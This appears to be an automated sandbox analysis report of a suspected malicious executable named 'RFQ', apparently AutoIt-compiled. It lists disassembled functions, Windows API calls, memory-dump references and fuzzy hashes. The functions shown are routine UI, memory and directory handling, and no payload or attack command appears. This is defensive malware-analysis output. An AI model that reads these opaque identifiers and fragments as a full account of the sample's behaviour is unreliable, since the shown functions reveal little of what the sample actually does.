                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                          • String ID:
                                                                          • API String ID: 1744303182-0
                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                          Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 4163708885-3819984048
                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                          Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                          • API String ID: 0-1896584978
                                                                          • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                          • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                          Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2485277191-404129466
                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                          Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                          Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                          • String ID: D
                                                                          • API String ID: 1914653954-2746444292
                                                                          • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                          • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                          Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1153243558-438819550
                                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                          Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll
                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                          • API String ID: 3832890014-4202584635
                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                          Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$CtrlFocus
                                                                          • String ID: 0
                                                                          • API String ID: 1534620443-4108050209
                                                                          • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                          • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                          Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroy
                                                                          • String ID: ,$tooltips_class32
                                                                          • API String ID: 1109047481-3856767331
                                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                          Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                          • String ID: 0
                                                                          • API String ID: 1441871840-4108050209
                                                                          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                          Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 3631882475-2268648507
